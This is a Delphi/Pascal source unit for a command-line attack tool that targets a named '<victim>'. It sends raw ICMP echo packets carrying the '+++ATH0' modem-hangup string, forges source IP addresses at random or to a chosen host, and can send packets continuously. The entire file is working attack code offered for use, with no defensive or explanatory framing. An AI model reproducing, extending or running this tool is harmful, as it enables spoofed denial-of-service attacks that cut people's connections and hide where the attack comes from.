unit u_main;

interface

uses
  u_winsck2, u_sysutils, u_sockhdr;

type
  TAthOpt = packed record
    Delay, Num, Sended, Source: Cardinal;
    HedefAdres: TSockAddrIn;
    RandomSeek: Integer;
    Socket: TSocket;
  end;

var
  AthOpt: TAthOpt;

  function GetRandomIP: Cardinal;
  function GetRandomValue(const Range: Integer): Integer;
  function Resolve(const host: PChar): Cardinal;
  procedure CreateSocket;
  procedure SendAth;
  procedure SendAth_FillIPhdr;
  procedure SetDefaultOptions;
  procedure SetParams;
  procedure Usage(const Path: string);

implementation

function GetRandomIP: Cardinal;
var
  IPArray: array [0..3] of Byte;
  i: Integer;
begin
  for i := 0 to 3 do
    IPArray[i] := GetRandomValue(255) + 1;
  Move(IPArray, Result, Sizeof(Result));
end;

function GetRandomValue(const Range: Integer): Integer; // function for getting different random
begin                                                   // values between very short times
  AthOpt.RandomSeek := (AthOpt.RandomSeek xor Range) + 1;
  Result := (Random(High(Integer)) xor AthOpt.RandomSeek) mod Range;
end;

function Resolve(const host: PChar): Cardinal; // function for resolving host to ip
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr := inet_addr(host); // convert ip address format (ex: 127.0.0.1) to cardinal
  if InAddr.S_addr = INADDR_NONE then // if it is not a ip address then resolve it
  begin
    HostEnt := GetHostByName(host);
    if not Assigned(HostEnt) then // if couldn't resolve the host then exit
    begin
      Writeln('Error: Unable to resolve host: ' + host);
      Halt(0);
    end;
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length); // move resolved host to InAddr.S_addr
  end;
  Result := InAddr.S_addr;
end;

procedure CreateSocket; // procedure for creating a raw socket
begin
  AthOpt.Socket := Socket(AF_INET, SOCK_RAW, IPPROTO_RAW); // create a socket
  if AthOpt.Socket = INVALID_SOCKET then // exit if couldn't create a socket
  begin
    Writeln('Error on creating socket');
    Halt(0);
  end;
  if SetSockOpt(AthOpt.Socket, IPPROTO_IP, IP_HDRINCL, '1', 4) <> 0 then
  begin // if can't set the IP_HDRINCL option then exit
    Writeln('Error: IP_HDRINCL'#13#10 +
            '(Note that this program only works on Windows XP)');
    Halt(0);
  end;
end;

const
  Data = '+++ATH0'#13#10;
  Len = 28 + Length(Data);

var
  Buf: array [0..(Len - 1)] of Char;
  IPhdr: PIPhdr = @Buf[0];
  ICMPhdr: PICMPhdr = @Buf[20];
  
procedure SendAth;
begin
  FillChar(Buf, Sizeof(Buf), 0);
  Move(Data[1], Buf[28], Length(Data));
  SendAth_FillIPhdr;
  ICMPhdr.icmp_type := 8;
  ICMPhdr.icmp_sum := CheckSum(@ICMPhdr^, Len - 20);
  Sendto(AthOpt.Socket, Buf, Len, 0, AthOpt.HedefAdres, Sizeof(AthOpt.HedefAdres));
end;

procedure SendAth_FillIPhdr;
begin
  IPhdr.ip_verlen := $45;
  IPhdr.ip_tos := 0;
  IPhdr.ip_len := htons(Len);
  IPhdr.ip_id := GetRandomValue(High(Word)) + 1;
  IPhdr.ip_ttl := 255;
  IPhdr.ip_p := 1;
  if AthOpt.Source = 0 then
    IPhdr.ip_src := GetRandomIP
  else
    IPhdr.ip_src := AthOpt.Source;
  IPhdr.ip_dst := AthOpt.HedefAdres.sin_addr.S_addr;
  IPhdr.ip_sum := CheckSum(@IPhdr^, 20);
end;

procedure SetDefaultOptions;
begin
  AthOpt.HedefAdres.sin_addr.S_addr := Resolve(PChar(ParamStr(1)));
  AthOpt.HedefAdres.sin_family := AF_INET;
  AthOpt.HedefAdres.sin_port := GetRandomValue(High(Word)) + 1;
end;

procedure SetParams;
var
  i: integer;
  pstr: string;
  Ch: Char;
begin
  for i := 2 to ParamCount do
  begin
    pstr := ParamStr(i);
    Ch := #0;
    if Length(pstr) = 2 then
    begin
      if pstr[1] = '-' then
        Ch := pstr[2];
    end;
    case Ch of
      's': AthOpt.Source := Resolve(PChar(ParamStr(i + 1)));
      'n': AthOpt.Num := StrtoIntDef(ParamStr(i + 1), 0);
      'd': AthOpt.Delay := StrtoIntDef(ParamStr(i + 1), 0);
    end;
  end;
end;

procedure Usage(const Path: string);
begin
  Write(
        'usage: ' + Path + ' <victim> [options]'#13#10#13#10 +
        'Options:'#13#10 +
        '  -s:    Spoof host     (0 is random (default))'#13#10 +
        '  -n:    Num of packets (0 is continuous (default))'#13#10 +
        '  -d:    Delay (in ms)  (default 0)'#13#10
       );
  Halt(0);
end;

end.
